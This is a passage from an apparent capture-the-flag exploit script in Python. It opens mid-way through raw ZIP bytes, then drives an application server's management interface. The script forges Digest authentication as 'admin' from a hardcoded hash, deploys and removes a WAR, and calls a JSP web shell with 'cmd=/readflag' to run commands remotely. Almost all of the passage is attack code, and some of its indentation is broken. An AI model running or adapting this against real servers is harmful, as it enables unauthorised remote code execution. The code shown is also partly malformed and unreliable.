\x00\x00\x00\x00\x00\x01\x00\x18\x00\x00\x1dq\x01\x0b\x90\xc9\x01\x00.x\xec\x9e\xcb\xd8\x01\x00.x\xec\x9e\xcb\xd8\x01PK\x05\x06\x00\x00\x00\x00\x05\x00\x05\x00t\x01\x00\x00g\x03\x00\x00\x00\x00')
	# vv = vv.replace(b'DATA',open('/home/hamidreza/pwn/javasass/playground/cmd.war','rb').read())
	v = v.replace(b'1337',str(len(vv)).encode())+vv
	s.send(v)
	s.recv(1000)
	s.close()
	#################################
	s = _socket.socket(_socket.AF_INET,_socket.SOCK_STREAM)
	s.connect(('localhost',8080))
	s.send(b'GET /lmao1337/cmdwow1337.jsp?cmd=/readflag HTTP/1.1\r\nHost: localhost:9990\r\n\r\n')
	g = s.recv(1000)
	stat = 'Noo'
	if(b'Error' not in g):
	stat = g
	break
	s = _socket.socket(_socket.AF_INET,_socket.SOCK_STREAM)
	s.connect(('localhost',9990))
	s.send(b'POST /management HTTP/1.1\r\nContent-Length:0\r\nHost: localhost:9990\r\n\r\n')
	nonce = s.recv(1000)
	nonce = nonce[nonce.index(b'nonce="')+7:]
	nonce = nonce[:nonce.index(b'"')]
	s.close()
	resp = (b'2a0923285184943425d1f53ddd58ec7a:'+nonce+b':00000001:18f6d13842fd9c57:auth:3db80d76fa31213a3e0dfb7dc406d705')
	resp = md5_to_hex(md5(resp))
	s = _socket.socket(_socket.AF_INET,_socket.SOCK_STREAM)
	s.connect(('localhost',9990))
	v = b'POST /management HTTP/1.1\r\nContent-Type: application/dmr-encoded\r\nOrigin: http://localhost:9990\nHost: localhost:9990\r\nContent-Length:1337\r\nAuthorization: Digest username="admin", realm="ManagementRealm", nonce="'+nonce+b'", uri="/management", algorithm=MD5, response="'+resp.encode()+b'", opaque="00000000000000000000000000000000", qop=auth, nc=00000001, cnonce="18f6d13842fd9c57"\r\n\r\n'
	vv = b'bwAAAAIACW9wZXJhdGlvbnMABnJlbW92ZQAHYWRkcmVzc2wAAAABcAAKZGVwbG95bWVudHMADGxtYW8xMzM3Lndhcg=='
	v = v.replace(b'1337',str(len(vv)).encode())+vv
	s.send(v)
	s.close()
	print(stat)
	stat
	################################